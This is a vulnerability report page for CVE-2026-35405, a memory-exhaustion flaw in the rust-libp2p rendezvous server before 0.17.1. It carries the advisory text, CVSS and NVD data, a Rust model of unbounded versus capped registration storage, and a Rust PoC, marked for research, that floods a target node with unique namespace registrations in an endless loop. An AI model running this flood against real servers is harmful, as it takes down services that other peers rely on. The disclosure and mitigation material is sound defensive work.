Security Vulnerability Report
CVE-2026-35405 CVSS 7.5 HIGH

Published: 2026-04-07 15:17:43
Last Modified: 2026-04-24 13:37:23

Description

libp2p-rust (rust-libp2p) is the official Rust implementation of the libp2p networking stack. Prior to 0.17.1, the libp2p-rendezvous server placed no limit on how many namespaces a single peer could register. A malicious peer can register unique namespaces in a loop; the server accepts every one and allocates memory for each registration with no pushback. Kept up long enough, or driven from multiple Sybil peers, this exhausts the server's memory and the process is OOM-killed. This vulnerability is fixed in 0.17.1.
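To make the resource-exhaustion mechanism concrete, the following is an added example, not code from rust-libp2p or from the advisory: a minimal registration store in the shape of a rendezvous server's, first with no limits, reproducing the pre-0.17.1 behaviour described above, then with a per-peer cap and a global cap. The `PeerId`, `Registrations`, `register` and `flood` names and the limit values are this example's own; the actual 0.17.1 fix may use different names and a different policy. A per-peer cap alone does not stop the Sybil variant the description mentions, which is why the hardened version also bounds the total, and every check runs before anything is allocated so a rejected request costs the server nothing.

```rust
use std::collections::{HashMap, HashSet};

/// Stand-in for libp2p's PeerId (this example's own type, not the library's).
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct PeerId(pub String);

#[derive(Debug, PartialEq, Eq)]
pub enum RegisterError {
    /// This peer already holds `limit` distinct namespaces.
    TooManyNamespacesForPeer { peer: PeerId, limit: usize },
    /// The server already holds `limit` registrations in total (Sybil defence).
    ServerFull { limit: usize },
}

/// Minimal registration store. With both limits `None` it behaves like the
/// pre-0.17.1 server described in the advisory: every unique (peer, namespace)
/// pair is retained, so memory grows with the number of requests.
pub struct Registrations {
    by_peer: HashMap<PeerId, HashSet<String>>,
    total: usize,
    max_per_peer: Option<usize>,
    max_total: Option<usize>,
}

impl Registrations {
    pub fn unbounded() -> Self {
        Self { by_peer: HashMap::new(), total: 0, max_per_peer: None, max_total: None }
    }

    pub fn bounded(max_per_peer: usize, max_total: usize) -> Self {
        Self {
            by_peer: HashMap::new(),
            total: 0,
            max_per_peer: Some(max_per_peer),
            max_total: Some(max_total),
        }
    }

    /// Register `namespace` for `peer`. All checks run before anything is
    /// allocated, so a rejected request leaves the store exactly as it was.
    pub fn register(&mut self, peer: &PeerId, namespace: &str) -> Result<(), RegisterError> {
        let existing = self.by_peer.get(peer);
        // Re-registering a namespace the peer already holds only refreshes it.
        if existing.is_some_and(|s| s.contains(namespace)) {
            return Ok(());
        }
        let held = existing.map_or(0, |s| s.len());
        if let Some(limit) = self.max_per_peer {
            if held >= limit {
                return Err(RegisterError::TooManyNamespacesForPeer { peer: peer.clone(), limit });
            }
        }
        if let Some(limit) = self.max_total {
            if self.total >= limit {
                return Err(RegisterError::ServerFull { limit });
            }
        }
        self.by_peer.entry(peer.clone()).or_default().insert(namespace.to_owned());
        self.total += 1;
        Ok(())
    }

    pub fn total(&self) -> usize { self.total }
    pub fn peers(&self) -> usize { self.by_peer.len() }
    pub fn count_for(&self, peer: &PeerId) -> usize {
        self.by_peer.get(peer).map_or(0, |s| s.len())
    }
}

/// The loop a malicious client runs: `attempts` registrations, each with a
/// namespace the server has never seen. Returns how many the store accepted.
pub fn flood(store: &mut Registrations, peer: &PeerId, attempts: usize) -> usize {
    (0..attempts)
        .filter(|i| store.register(peer, &format!("ns-{i}")).is_ok())
        .count()
}

fn main() {
    let attacker = PeerId("12D3KooW-attacker".into()); // constructed identity

    let mut vulnerable = Registrations::unbounded();
    let n = flood(&mut vulnerable, &attacker, 100_000);
    println!("unbounded store: {n} accepted, {} retained", vulnerable.total());

    let mut hardened = Registrations::bounded(100, 1_000);
    let n = flood(&mut hardened, &attacker, 100_000);
    println!("bounded store: {n} accepted from a single peer");

    // Sybil variant: 50 fresh identities, 100 namespaces each. The per-peer cap
    // passes every one of them; only the global cap stops the growth.
    let sybil: usize = (0..50)
        .map(|p| flood(&mut hardened, &PeerId(format!("sybil-{p}")), 100))
        .sum();
    println!("sybil flood: {sybil} accepted, {} retained from {} peers",
        hardened.total(), hardened.peers());
}
```

The unbounded store retains one entry per request, which is the growth the advisory describes; the bounded store stops the single-peer flood at 100 and the Sybil flood at the global cap, and peers rejected by either check leave no entry behind.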

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-770 (Allocation of Resources Without Limits or Throttling)

The vector reads as a network-reachable, low-complexity attack requiring no privileges and no user interaction, with impact confined to availability.

Configurations (Affected Products)

cpe:2.3:a:protocol:libp2p:*:*:*:*:*:rust:*:* - VULNERABLE (versionEndExcluding 0.17.1)
libp2p-rust < 0.17.1

Note: the description attributes the flaw to the libp2p-rendezvous server component and gives 0.17.1 as the fixed version, while the NVD CPE above is keyed to the umbrella libp2p product. Check the linked GHSA for the exact crate and version before matching this against a dependency lockfile.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
rust
// Conceptual PoC for CVE-2026-35405: exhaust a pre-0.17.1 rendezvous server's
// memory by registering an unbounded number of unique namespaces from one peer.
// Swarm construction is omitted. The call shape follows
// libp2p::rendezvous::client::Behaviour::register(namespace, rendezvous_node, ttl);
// verify it against the crate version you are testing, since the API has moved
// between releases.
use libp2p::{rendezvous, PeerId, Swarm};
use std::time::Duration;

#[tokio::main]
async fn main() {
    // ... (Swarm setup omitted for brevity) ...
    let mut swarm: Swarm<rendezvous::client::Behaviour> = /* ... */;
    // PeerId of the target rendezvous server (the node being flooded).
    let rendezvous_node: PeerId = /* ... */;

    loop {
        // Each iteration uses a namespace the server has never seen, so a
        // vulnerable server (< 0.17.1) allocates a fresh registration entry
        // every time, with no per-peer limit to push back.
        let unique_namespace = format!("exploit_namespace_{}", uuid::Uuid::new_v4());
        let namespace = rendezvous::Namespace::new(unique_namespace.clone())
            .expect("namespace is within the protocol length limit");

        // register() only queues the request; the swarm must also be polled
        // (e.g. swarm.select_next_some().await) for it to be sent and for the
        // server's Registered/RegisterFailed event to arrive. It fails locally
        // if this peer has no confirmed external address to register.
        match swarm.behaviour_mut().register(namespace, rendezvous_node, None) {
            Ok(()) => println!("Requested registration of {unique_namespace}"),
            Err(e) => eprintln!("Registration request failed locally: {e:?}"),
        }

        // Small delay to avoid saturating the local network; keep it fast.
        tokio::time::sleep(Duration::from_millis(10)).await;
        // Every accepted registration is retained server-side. Run long enough,
        // or from several sybil peers in parallel, the server is OOM-killed.
    }
}

References

https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-cqfx-gf56-8x59 (Vendor Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35405", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:43.367", "lastModified": "2026-04-24T13:37:22.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libp2p-rust is the official rust language Implementation of the libp2p networking stack. Prior to 0.17.1, libp2p-rendezvous server has no limit on how many namespaces a single peer can register. A malicious peer can just keep registering unique namespaces in a loop and the server happily accepts every single one allocating memory for each registration with no pushback. Keep doing this long enough (or with multiple sybil peers) and the server process gets OOM killed. This vulnerability is fixed in 0.17.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protocol:libp2p:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.17.1", "matchCriteriaId": "0EA2FB25-A1F1-4E02-A0C9-0BCC07AFCA5C"}]}]}], "references": [{"url": "https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-cqfx-gf56-8x59", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-cqfx-gf56-8x59", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}